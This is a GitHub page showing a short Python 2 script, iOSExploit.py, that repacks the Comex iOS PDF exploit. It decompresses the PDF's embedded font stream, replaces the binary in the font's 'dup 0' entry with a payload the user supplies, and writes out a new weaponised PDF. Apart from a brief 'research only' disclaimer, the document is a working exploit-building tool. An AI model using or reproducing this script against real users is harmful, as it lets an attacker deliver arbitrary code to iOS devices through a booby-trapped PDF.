This repository has been archived by the owner on Feb 10, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathiOSExploit.py
executable file
·70 lines (55 loc) · 2.01 KB
/
iOSExploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/python
import zlib, sys, re, struct
# Disclaimer
print 'This information is for research and academic purposes only! This info is not to be abused! I am not responsible for any damage that you may create!'
print 'Jose Selvi - [email protected]'
# Checking Arguments
if len(sys.argv) != 4:
print 'Usage: ' + sys.argv[0] + ' <Comex_PDF_Exploit.pdf> <New_Payload.bin> <Output.pdf>'
exit()
print 'Input PDF: ' + sys.argv[1]
print 'Inpunt Binary: ' + sys.argv[2]
print 'Output PDF: ' + sys.argv[3]
# Read PDF Exploit
pdf = open(sys.argv[1], 'rb').read()
# Search encoded stream
m1 = re.search('\nstream\n', pdf)
stream_begin = m1.end()
m2 = re.search('\nendstream\n', pdf[stream_begin:])
stream_end = m2.start() + stream_begin
# Split PDF content
pdf_before_stream = pdf[:stream_begin-1]
pdf_encoded_stream = pdf[stream_begin:stream_end]
pdf_after_stream = pdf[stream_end+1:]
# Decode Stream
pfb = zlib.decompress( pdf_encoded_stream )
# Search dup 0 line
m1 = re.search('\n/Subrs [0-9]+ array\n', pfb)
dup_begin = m1.end()
m2 = re.search('\ndup 1 ', pfb)
dup_end = m2.start()
# Split PFB Content
pfb_before_dup0 = pfb[:dup_begin-1]
pfb_dup0 = pfb[dup_begin:dup_end]
pfb_after_dup0 = pfb[dup_end+1:]
# Get Lenght and encoded file
m1 = re.search('dup 0 [0-9]+ x ', pfb_dup0)
file_begin = len(m1.group(0))
file_end = len(pfb_dup0)-4
# Save original binary
z_oldbin = pfb_dup0[file_begin:file_end]
z_oldbin_len = len( z_oldbin )
# Read new payload
newbin = open(sys.argv[2], 'rb').read()
newbin_encoded = zlib.compress( newbin, 9 )
newbin_len = len( newbin_encoded )
newbin_encoded = newbin_encoded + '\x00'*(z_oldbin_len-newbin_len)
newbin_len = len( newbin_encoded )
# Create Dup 0 string
pfb_dup0 = 'dup 0 ' + str(newbin_len) + ' x ' + newbin_encoded + ' put'
# Create New PFB
pfb = pfb_before_dup0 + '\n' + pfb_dup0 + '\n' + pfb_after_dup0
# Compress PFB and Create New PDF
pdf_encoded_stream = zlib.compress( pfb, 9 )
pdf = pdf_before_stream + '\n' + pdf_encoded_stream + '\n' + pdf_after_stream
open(sys.argv[3], 'wb').write(pdf)